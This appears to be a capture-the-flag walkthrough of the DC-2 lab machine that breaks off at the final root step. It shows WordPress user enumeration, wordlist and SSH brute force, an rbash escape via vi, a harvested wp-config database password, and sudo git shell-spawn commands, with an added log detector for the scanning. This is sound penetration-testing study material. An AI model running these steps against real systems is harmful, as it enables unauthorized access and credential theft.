DC-2 Target Machine

DC series target machines

Information Gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.124
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-09 09:54 EDT
Nmap scan report for 192.168.56.124
Host is up (0.00039s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
7744/tcp open raqmon-pdu
MAC Address: 08:00:27:00:39:E2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds

Two ports are open: 80 and 7744.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80,7744 192.168.56.124
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-09 09:54 EDT
Nmap scan report for 192.168.56.124
Host is up (0.00065s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:00:39:E2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.19 seconds

Port 80 redirects to the hostname dc-2, so we need to add that mapping to the hosts file. Port 7744 is an SSH service, and the operating system is Debian.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p80,7744 192.168.56.124
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-09 09:58 EDT
Nmap scan report for dc-2 (192.168.56.124)
Host is up (0.00053s latency).

PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /: WordPress version: 4.7.10
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-wordpress-users:
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
7744/tcp open raqmon-pdu
MAC Address: 08:00:27:00:39:E2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.03 seconds

Directory Brute-forcing

The vuln script scan found WordPress, so let's also brute-force directories while we're at it.

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ sudo dirsearch -u http://dc-2/
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/dc-2/-_23-07-09_10-49-19.txt

Error Log: /root/.dirsearch/logs/errors-23-07-09_10-49-19.log

Target: http://dc-2/

[10:49:19] Starting:
[10:49:21] 403 - 290B - /.ht_wsr.txt
[10:49:21] 403 - 293B - /.htaccess.save
[10:49:21] 403 - 293B - /.htaccess.orig
[10:49:21] 403 - 295B - /.htaccess.sample
[10:49:21] 403 - 293B - /.htaccess.bak1
[10:49:21] 403 - 284B - /.html
[10:49:21] 403 - 291B - /.htaccessBAK
[10:49:21] 403 - 291B - /.htaccess_sc
[10:49:21] 403 - 283B - /.htm
[10:49:21] 403 - 294B - /.htaccess_extra
[10:49:21] 403 - 291B - /.htaccessOLD
[10:49:21] 403 - 292B - /.htaccessOLD2
[10:49:21] 403 - 293B - /.htaccess_orig
[10:49:21] 403 - 289B - /.htpasswds
[10:49:21] 403 - 290B - /.httr-oauth
[10:49:21] 403 - 293B - /.htpasswd_test
[10:49:21] 403 - 283B - /.php
[10:49:21] 403 - 284B - /.php3
[10:49:41] 301 - 0B - /index.php -> http://dc-2/
[10:49:43] 200 - 19KB - /license.txt
[10:49:50] 200 - 7KB - /readme.html
[10:49:51] 403 - 292B - /server-status
[10:49:51] 403 - 293B - /server-status/
[10:49:58] 301 - 299B - /wp-admin -> http://dc-2/wp-admin/
[10:49:58] 200 - 0B - /wp-content/
[10:49:58] 301 - 301B - /wp-content -> http://dc-2/wp-content/
[10:49:58] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[10:49:58] 500 - 0B - /wp-content/plugins/hello.php
[10:49:58] 301 - 302B - /wp-includes -> http://dc-2/wp-includes/
[10:49:58] 500 - 0B - /wp-includes/rss-functions.php
[10:49:58] 200 - 0B - /wp-config.php
[10:49:58] 200 - 40KB - /wp-includes/
[10:49:59] 302 - 0B - /wp-admin/ -> http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
[10:49:59] 200 - 1B - /wp-admin/admin-ajax.php
[10:49:59] 200 - 2KB - /wp-login.php
[10:49:59] 302 - 0B - /wp-signup.php -> http://dc-2/wp-login.php?action=register
[10:49:59] 200 - 0B - /wp-cron.php
[10:49:59] 500 - 4KB - /wp-admin/setup-config.php
[10:49:59] 200 - 1KB - /wp-admin/install.php
[10:49:59] 405 - 42B - /xmlrpc.php

Task Completed

The entries that look most valuable are wp-login.php and wp-content/plugins/akismet/akismet.php.

wpscan Scan

Use wpscan to enumerate users and plugins.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://dc-2 -e ap,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | _ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://dc-2/ [192.168.56.124]
[+] Started: Sun Jul 9 10:11:35 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.2
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Jul 9 10:11:40 2023
[+] Requests Done: 27
[+] Cached Requests: 37
[+] Data Sent: 7.013 KB
[+] Data Received: 178.184 KB
[+] Memory used: 254.168 MB
[+] Elapsed time: 00:00:04

We got the usernames admin, tom and jerry. No plugins were found, possibly because aggressive mode wasn't enabled. Let's look at the web interface first.

The flag page gives a hint. Roughly: use the cewl command to build a wordlist, since an ordinary wordlist won't crack it; also, the second flag should be reachable through one of two or more users.

Building a Wordlist with cewl

So the approach is obvious: we already have the username list from wpscan, now build a wordlist with cewl, and finally brute-force with wpscan.

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ cewl http://dc-2/ > passwdlist

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ cewl http://dc-2/index.php/what-we-do/ >> passwdlist

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ cewl http://dc-2/index.php/our-people/ >>passwdlist

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ cewl http://dc-2/index.php/our-products/ >> passwdlist

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ cewl http://dc-2/index.php/flag/ >> passwdlist

Brute-forcing with wpscan

The words from every page linked in the visible interface have been collected into passwdlist.

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ wpscan --url http://dc-2 -U user -P passwdlist
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | _ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://dc-2/ [192.168.56.124]
[+] Started: Sun Jul 9 10:17:34 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.2
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=====================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
Trying admin / CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/) Time: 00:00:00 <> (0 / 3585[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / nascetur Time: 00:02:38 <=============== > (1605 / 3995) 40.17% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Jul 9 10:20:17 2023
[+] Requests Done: 1746
[+] Cached Requests: 37
[+] Data Sent: 836.025 KB
[+] Data Received: 992.351 KB
[+] Memory used: 253.152 MB
[+] Elapsed time: 00:02:42

Two valid username/password pairs were found. While logging into the WordPress admin panel, also try them over SSH.
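From the defender's side, the user enumeration and the XML-RPC password attack above leave a characteristic pattern in the web server's access log. The detector below is an added example, not part of the original write-up; the log lines, the visitor address 192.168.56.50 and the thresholds are constructed assumptions, while the scanner address 192.168.56.106 is the Kali host that appears later in the SSH login banner.

```python
"""Detect the WordPress reconnaissance shown above in Apache access logs.

Added example, not part of the original write-up. It looks for the
footprint wpscan leaves: author-ID enumeration (?author=N), the wp-json
user listing, and a burst of POSTs to xmlrpc.php (the XML-RPC password
attack the scan output reports). All log lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format; httpd writes timestamps like 09/Jul/2023:10:11:35 -0400
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Thresholds are assumptions for this example; tune them per site.
AUTHOR_IDS_PER_IP = 5    # distinct ?author=N values from one client
XMLRPC_POSTS = 20        # POSTs to xmlrpc.php from one client ...
XMLRPC_WINDOW_SEC = 60   # ... inside this many seconds


def parse_line(line):
    """Parse one combined-format line; None when the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def analyse(lines):
    """Return a sorted list of (client ip, finding) pairs."""
    author_ids = defaultdict(set)
    xmlrpc_posts = defaultdict(list)
    findings = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        m = re.search(r"[?&]author=(\d+)", path)
        if m:
            author_ids[ip].add(int(m.group(1)))
        if "/wp-json/wp/v2/users" in path:
            findings.add((ip, "rest-user-listing"))
        if rec["method"] == "POST" and path.split("?")[0].endswith("/xmlrpc.php"):
            xmlrpc_posts[ip].append(rec["ts"])
    for ip, ids in author_ids.items():
        if len(ids) >= AUTHOR_IDS_PER_IP:
            findings.add((ip, "author-id-enumeration"))
    for ip, stamps in xmlrpc_posts.items():
        stamps.sort()
        lo = 0  # sliding window over the sorted timestamps
        for hi, t in enumerate(stamps):
            while (t - stamps[lo]).total_seconds() > XMLRPC_WINDOW_SEC:
                lo += 1
            if hi - lo + 1 >= XMLRPC_POSTS:
                findings.add((ip, "xmlrpc-password-attack"))
                break
    return sorted(findings)


def sample_log():
    """Constructed log: one scanner (192.168.56.106) and one ordinary visitor."""
    t0 = datetime(2023, 7, 9, 10, 11, 35, tzinfo=timezone(timedelta(hours=-4)))
    scanner_ua = '"-" "WPScan v3.8.24 (https://wpscan.com/wordpress-security-scanner)"'
    browser_ua = '"-" "Mozilla/5.0"'

    def line(ip, sec, method, path, status, agent=scanner_ua):
        ts = (t0 + timedelta(seconds=sec)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 {agent}'

    scanner, visitor = "192.168.56.106", "192.168.56.50"
    lines = [line(visitor, 0, "GET", "/", 200, browser_ua)]
    lines += [line(scanner, i, "GET", f"/?author={i}", 301) for i in range(1, 11)]
    lines.append(line(scanner, 12, "GET", "/index.php/wp-json/wp/v2/users/?per_page=100&page=1", 200))
    lines += [line(scanner, 20 + i, "POST", "/xmlrpc.php", 200) for i in range(25)]
    lines.append(line(visitor, 40, "POST", "/xmlrpc.php", 200, browser_ua))  # a lone pingback
    return lines
```

A single visitor hitting xmlrpc.php once is not reported; only the scanner, which trips all three rules, shows up.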

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ hydra -L sshuser -P sshpassswd 192.168.56.124 ssh -s 7744
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-09 11:40:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task
[DATA] attacking ssh://192.168.56.124:7744/
[7744][ssh] host: 192.168.56.124 login: tom password: parturient
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-09 11:40:37

tom's account can log in over SSH. In the WordPress admin panel, the second flag is hidden in a post that is only visible when logged in as jerry.

This user is not admin and cannot upload plugins, so there is no way to upload a shell through the admin panel. Since we already have SSH credentials, that doesn't matter.

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ ssh tom@192.168.56.124 -p 7744
tom@192.168.56.124's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 9 11:47:06 2023 from 192.168.56.106
tom@DC-2:~$ whami
-rbash: whami: command not found
tom@DC-2:~$

rbash Bypass

Not sure what rbash is; let's look it up.

The rbash in Linux - Understanding Restricted Bash - LinuxForDevices

In short, rbash restricts the commands a user may run, for security reasons. After trying a few commands, cd and whoami turn out to be blocked, but ls isn't, so use ls to read the directories.

tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ ls ./usr
bin
tom@DC-2:~$ ls ./usr/bin
less ls scp vi

There are four files in this path, which presumably correspond to the four commands the user is allowed to run. Let's search for "rbash escape" and "rbash bypass".

44592-linux-restricted-shell-bypass-guide.pdf (exploit-db.com): this PDF on exploit-db gives many bypass methods and ideas. Essentially they all use an available command to start a new bash, so we can borrow the shell-spawning techniques from GTFOBins.

I tried a few; the less-based shell-spawning methods all had problems.

tom@DC-2:~$ VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
/bin/rbash: /bin/sh: restricted: cannot specify `/' in command names
/bin/rbash: /bin/sh: restricted: cannot specify `/' in command names

I went with vi instead.

vi
:set shell=/bin/sh
:shell

Note that if you use set shell=/bin/bash here, the bypass still fails; the error record follows.

whoami

[1]+ Stopped vi
tom@DC-2:~$ whoami
-rbash: whoami: command not found

Read flag3.txt with less

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

cat, whoami and other commands still don't work; let's look at the environment variables.

$ echo $PATH
/home/tom/usr/bin

So the cause is that PATH does not contain the directories of the usual programs. At first I didn't think to check the environment either: I called python by absolute path to get a reverse shell and found that the shell still couldn't find many commands, and only while browsing directories later did I notice that /usr/bin does contain the usual programs. The next step is to add the common directories to PATH; I checked what PATH looks like on Kali.

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

Write the same PATH as on Kali into the target's environment.

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH
$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/home/tom/usr/bin

After a lot of fiddling the shell is finally usable. Try sudo -l.

$ sudo -l
[sudo] password for tom:
Sorry, user tom may not run sudo on DC-2.

Information Gathering and User Switching

No sudo rights. Going into /home reveals another user, jerry; it feels like a Tom and Jerry joke. Also, if you look carefully at the WordPress admin panel after logging in, the user's full name in the profile is tom cat.

$ cd /home/jerry
$ ls -liah
total 28K
128057 drwxr-xr-x 2 jerry jerry 4.0K Mar 21 2019 .
1558 drwxr-xr-x 4 root root 4.0K Mar 21 2019 ..
140336 -rw------- 1 jerry jerry 270 Jul 10 04:47 .bash_history
128060 -rw-r--r-- 1 jerry jerry 220 Mar 21 2019 .bash_logout
128058 -rw-r--r-- 1 jerry jerry 3.5K Mar 21 2019 .bashrc
140348 -rw-r--r-- 1 jerry jerry 223 Mar 21 2019 flag4.txt
128059 -rw-r--r-- 1 jerry jerry 675 Mar 21 2019 .profile
$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!

I couldn't quite read the subtext of this hint: on one hand it says there are no hints, on the other the last line looks odd. On the WordPress side, the database password should be in the config file, so consider password reuse, database information leakage, or MySQL privilege escalation.

$ cd /var/www/html
$ ls -liah
total 200K
27872 drwxr-xr-x 5 1006 1006 4.0K Mar 21 2019 .
26852 drwxr-xr-x 4 root root 4.0K Mar 21 2019 ..
32857 -rw-r--r-- 1 1006 1006 418 Sep 24 2013 index.php
32860 -rw-r--r-- 1 1006 1006 20K Jan 23 2018 license.txt
32859 -rw-r--r-- 1 1006 1006 7.3K Oct 31 2017 readme.html
32861 -rw-r--r-- 1 1006 1006 5.4K Sep 27 2016 wp-activate.php
28084 drwxr-xr-x 9 1006 1006 4.0K Apr 4 2018 wp-admin
32867 -rw-r--r-- 1 1006 1006 364 Dec 19 2015 wp-blog-header.php
32856 -rw-r--r-- 1 1006 1006 1.6K Aug 29 2016 wp-comments-post.php
33614 -rw-r--r-- 1 root root 3.2K Mar 21 2019 wp-config.php
32862 -rw-r--r-- 1 1006 1006 2.8K Dec 16 2015 wp-config-sample.php
32863 drwxr-xr-x 5 1006 1006 4.0K Apr 4 2018 wp-content
27915 -rw-r--r-- 1 1006 1006 3.3K May 24 2015 wp-cron.php
32868 drwxr-xr-x 18 1006 1006 12K Apr 4 2018 wp-includes
33613 -rw-r--r-- 1 1006 1006 2.4K Nov 20 2016 wp-links-opml.php
28080 -rw-r--r-- 1 1006 1006 3.3K Oct 24 2016 wp-load.php
27914 -rw-r--r-- 1 1006 1006 34K Apr 3 2018 wp-login.php
32866 -rw-r--r-- 1 1006 1006 7.9K Jan 11 2017 wp-mail.php
32865 -rw-r--r-- 1 1006 1006 16K Apr 6 2017 wp-settings.php
33612 -rw-r--r-- 1 1006 1006 30K Oct 19 2016 wp-signup.php
32858 -rw-r--r-- 1 1006 1006 4.5K Oct 14 2016 wp-trackback.php
28008 -rw-r--r-- 1 1006 1006 3.0K Aug 31 2016 xmlrpc.php

There is indeed a wp-config file.

$ cat wp-config.php
<?php
define('WP_HOME','http://dc-2');
define('WP_SITEURL','http://dc-2');

/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpressdb');

/** MySQL database username */
define('DB_USER', 'wpadmin');

/** MySQL database password */
define('DB_PASSWORD', '4uTiLL');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/

define('AUTH_KEY', ',dl5^nwxT:/et,y6K$f=q+X|nk47g=@spk<w?->-DsKODlCXNmNtmH]gA{xoBl%x');
define('SECURE_AUTH_KEY', '!]B|&_X _{|rp 5fY6UU+fU$I6b!kvKa{r3S|xs.]:WWm>:{,?M`qq8TwKZmx T|');
define('LOGGED_IN_KEY', 'a5:jar{YEiPSA{sq[4KO-|OZk=Sp^f+3}8bZ5zAb0skMj)CAC1W}SH}vx(nU2NX]');
define('NONCE_KEY', '7PhZ~$,c$xng{U|Kv`-%R?>T+9,|M_h!dXY}yk;|:ZX|;M:ZL|DDoUR[n)h4|NY%');
define('AUTH_SALT', '({(<.wWSJmt|<OY@%tg(!kwk4]1U.%<wL+zA0F]ZQn|IHs%W>`Fu-FtJ~j;Fb>Zz');
define('SECURE_AUTH_SALT', '@(xD@ W~>EH7Pd^i!9(-V1)%@P[6=WQ0s6SP,otK.rKE4WWhF)?DK0wM1LOR#E|x');
define('LOGGED_IN_SALT', 'H@?@Gqd>Cfuhbr2>U4RNoVpA3{+~_`o@b,2s)uwl*|MG GB^2tx~Vrc^w60Rv`h(');
define('NONCE_SALT', 'x~|2pyiJ^j!L=dBM<S$|U/)pE1HN|{o,Yu-~[NT_VaEI7Go5uNaqNzBs1aA063a%');


/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define( 'WP_AUTO_UPDATE_CORE', false );

Got wpadmin:4uTiLL. After logging into the database, the user passwords are all hashed, so admin's password cannot be recovered. Looking at MySQL privilege escalation, the writable directory is restricted, so the conditions aren't met; the only option left is trying password reuse.

Tried logging in as root with 4uTiLL, parturient and adipiscing; all failed.

Tried logging in as jerry; adipiscing worked.

Privilege Escalation via sudo git

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git

git can be run as root without a password, which matches the hint in flag4.txt. Next, escalate following the GTFOBins technique.

jerry@DC-2:~$ sudo PAGER='sh -c "exec sh 0<&1"' git -p help
sudo: sorry, you are not allowed to set the following environment variables: PAGER
jerry@DC-2:~$ sudo PAGER='sh -c "exec sh 0<&1"' /usr/bin/git -p help
sudo: sorry, you are not allowed to set the following environment variables: PAGER

Method (a) failed; try method (b).

jerry@DC-2:~$ sudo git -p help config
